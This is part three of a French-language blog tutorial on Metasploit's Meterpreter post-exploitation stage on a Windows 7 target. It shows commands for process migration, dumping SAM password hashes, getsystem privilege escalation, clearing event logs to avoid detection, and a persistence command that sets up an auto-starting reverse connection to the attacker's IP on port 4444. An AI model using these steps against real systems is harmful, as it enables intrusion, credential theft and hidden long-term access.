METASPLOIT : le guide ultime du hacker (3)

METASPLOIT : le guide ultime du hacker (3)

Dans le tuto précèdent on a pu avoir une session meterpreter sur notre machine ce qui nous a offert un contrôle total sur la machine distante (sous Windows 7), et à ce point-là, on avait finis avec la phase de l’exploitation. Dans ce tuto, nous allons aborder la phase de post-exploitation dans le principal joueur est meterpreter.

En fait, meterpreter est un payload qui une fois exécuté sur le système cible nous aurons un shell interactif, autrement dit meterpreter est une sorte d’extension du framework qui nous permet de récupérer les hashs, pivoter et migrer entre les processus, manipuler les fichiers et beaucoup d’autre hack.

COMMANDES DE BASES :

Si vous vous rappelez, le dernier tuto on a pu avoir une session meterrpreter qui ressemble à quelque chose comme ça :

meterpreter_session

 

Déjà, comme vous le voyez dans la capture ci-dessus, j’ai utilisé la commande syinfo pour avoir une idée sur l’OS que j’ai hacké. MAIS Voyons comment extraire plus d’informations en utilisant des commandes basiques.

 

La première commande qu’il faut impérativement savoir, c’est la commande “help”, cette commande vous fournit toutes les commandes qu’ils sont à votre porté sur meterpreter :

meterpreter_help

 

Vous voyez que c’est vraiment riche en commandes, pratiquement c’est tout ce que vous en avez besoin pour interagir avec meterrpeter mais nous allons voir ensemble celles qui sont plus utilisées.

 

Θ screenshot :

Juste pour vous faire plaisir 😜, la commande screenshot vous permet de prendre une capture d’écran de la machine victime :

screenshot

 

C’est une excellente façon d’étudier le système, par exemple dans notre cas, on voit bien que notre cible est “PROTÉGER” par un antivirus AVAST (nous devons être plus prudents dans ce cas.), et que python est installé (au cas où on veut pivoter 😬), bref, c’est très utile, mais pas suffisant.

 

Θ Ps :

La commande ps fourni une liste des processus en cours d’exécution, cela est très important, notamment quand vous voulez émigrer d’un service que vous avez exploiter (internet_explorer dans notre cas) vers un autre plus stable ce qui diminue le risque de mortalité de notre session au moment de la fermeture du service exploité.

meterpreter_ps

 

Pour émigrer, il suffit d’utiliser la commande “migrate suivi du numéro du processus PID, dans l’exemple suivant je vais déplacer le processus de mon payload vers le processus VBoxTray.exe(PID=1492) :

migrate

 

 

Θ Dump :

Maintenant et que vous êtes habitué avec votre environnement, il ne vous reste qu’a récupérer les hashs stocké dans le système. Cependant, vous avez le choix d’utiliser le keylogger fournit par meterpreter ainsi que d’autre informations confidentielles.

Tout d’abord verifiez l’autorité que vous avez sur le systéme en executant la commande “getuid” :

getuid

 

Vous voyez que je suis entrain d’exécuter les commandes en tant qu’ADIMINISTRATEUR (super utilisateur) et c’est exactement ce que nécessite la commande hashdump afin qu’elle puisse bypasser les restrictions du registre du système et récupérer les hashs depuis le gestionnaire de compte SAM :

hashdump

 

D’habitude, Microsoft enregistre les hashs dans LAN Manager(LM) et NT LAN MANAGER (NTLM).

 

Dans le cas du stockage LAN, si le mot de passe entré par l’utilisateur est fait de 14 caractères, il peu être divisé en deux valeurs de 7 caractères puis chaque valeur est hashé séparément, de cette façon le hacker n’a qu’a cracker que 2 mots de passe de 7 caractère ce qui facilite énormément les choses.

Cependant, le stockage type NTLM hash directement le mot de passe quel qu’il soit et il l’enregistre dans le SAM (security account manager).

 

N.B : Pour apprendre comment cracker un mot de passe hashé, j’ai déjà écrit un article sur comment cracker un mot de passe avec python.

 

Ce que vous devez savoir, c’est que tout hash qui commence avec la valeur aad3b435 reflète un hash de valeur NUL ! Et si vous contemplez le hash que j’ai récupéré de la base SAM vous trouverez que c’est le cas.

 

Θ Élévation de privilège :

Dans certaines situations, vous arrivez à exploiter une machine avec peu de pouvoir dans ce cas-là vous devez procédez à une élévation de privilèges (privilige escalation), mais il faut savoir que cet objectif (d’enlever les restrictions) n’est pas toujours facile et peu vite se compliquer en fonction de votre terrain.

 

La premier commande à essyer, c’est “getsystem” :

getsystem

 

Voila, maintenant on est authorité (rien ne peut vous faire face 😎).

Pour revenir au compte précèdent exécutez la commande “rev2self” comme suit :

rev2self

 

Θ Clearev :

Cette commande vous permet d’effacer le journal d’évenement, il faut etre vigilant en conducant vos hack car s’introduire dans un systeme est simple, ce qui demande des compétences c’est de passer inapercue.

clearev

 

Cette commande ne fait pas tout le travail, il va falloir aussi nettoyer le registre.

Θ Meterpreter scripts :

 

Meterpreter est équipé de plusieurs scripts externe que vous pouvez appelez, ces derniers peuvent vous aider à accomplir des tache prédéfinie (et parfois complexes).

 

N.B : certains scripts obsolètes et ne sont pas assez stable, mais je ne vais démontrer que celle qui ont marché avec moi.

 

Pour exécuter un script entrez la commande “run nom_du_script”.

Une des fonctionnalités qu’aime les newbies est l’intéraction avec la machine victime via une interface graphique, vous pouvez le faire en utilisant un script qui va faire en sorte de créer un tunnel de communication entre les deux machine par le biais du protocole VNC (virtual network computing).

run_vnc

La commande est simple “run vnc” va installer une session vnc sur la machine distante, en conséquence une fenêtre VNC devrait apparaître montrant le bureau de la machine victime :

vnc

 

 

Θ Persistnce :

 

Il ne faut pas oublier que jusque-là votre session meterpreter peut se déconnecté à n’importe quel moment, pour cela vous devez ancrer votre serveur dans le système 🙃, c’est ce qu’on appelle persistance , de cette façon même si la machine distante se déconnecte ou  le système d’exploitation crash vous aurez toujours une connexion inverse depuis l’agent que vous avez planter.

Voici la syntaxe que j’utilise

Run persistence -X -i 20 -p 4444 -r IP_ADRESSE

Sachant que :

persistence : c’est le nom du script

-X : démarage automatique de l’agent

-i 20 : l’agent retentit chaque 20 secondes détablir une connexion.

-p 4444 : tentation de connexion sur le port 4444

-r VOTRE_IP : l’IP adresse de la machine du hacker.

persistance

 

Maintenant, si votre machine se redémarre, automatiquement une connexion inverse va s’établir grâce à votre agent persistant.

 

 

Voilà, jusque-là, vous avez acquis les bases pour comprendre comment meterpreter fonctionne et vous avez eu une idée sur sa puissance, et au fil de votre pratique vous allez apprendre de nouvelles techniques et pourquoi pas créer vos propres scripts et contribuez au développement de Metsploit !!.

 

Le prochain tuto (ou vidéo) on traitera un challenge real life ce qui va vous permettre de mettre tout ce que vous avez appris en œuvre…………so stay tuned 😜.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

cinq + vingt =

Share via